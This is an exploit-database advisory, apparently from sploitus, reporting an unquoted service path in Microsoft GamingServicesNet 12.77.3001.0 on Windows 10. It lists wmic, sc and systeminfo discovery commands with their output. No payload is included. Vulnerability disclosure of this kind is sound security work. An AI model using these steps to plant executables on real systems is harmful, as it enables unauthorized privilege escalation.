Share
## https://sploitus.com/exploit?id=1337DAY-ID-38754
# Exploit Title: Microsoft GamingServicesNet 12.77.3001.0 -
'GamingServicesNet' Unquoted Service Path
# Exploit Author: tmrswrr
# Vendor : https://www.microsoft.com/store/productId/9MWPM2CQNLHN
# Version : 12.77.3001.0
# Tested on OS: Windows 10 Enterprise

# Step to discover Unquoted Service Path:

==============
>> wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """

Gaming Services GamingServicesNet
C:\Program
Files\WindowsApps\Microsoft.GamingServices_12.77.3001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe

                                                              Auto

C:\>sc qc GamingServicesNet
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: GamingServicesNet
        TYPE               : 210  WIN32_PACKAGED_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program
Files\WindowsApps\Microsoft.GamingServices_12.77.3001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Gaming Services
        DEPENDENCIES       : staterepository
        SERVICE_START_NAME : NT AUTHORITY\LocalService

C:\>systeminfo
Host Name:                 DESKTOP-JAN8AJH
OS Name:                   Microsoft Windows 10 Enterprise Evaluation
OS Version:                10.0.19045 N/A Build 19045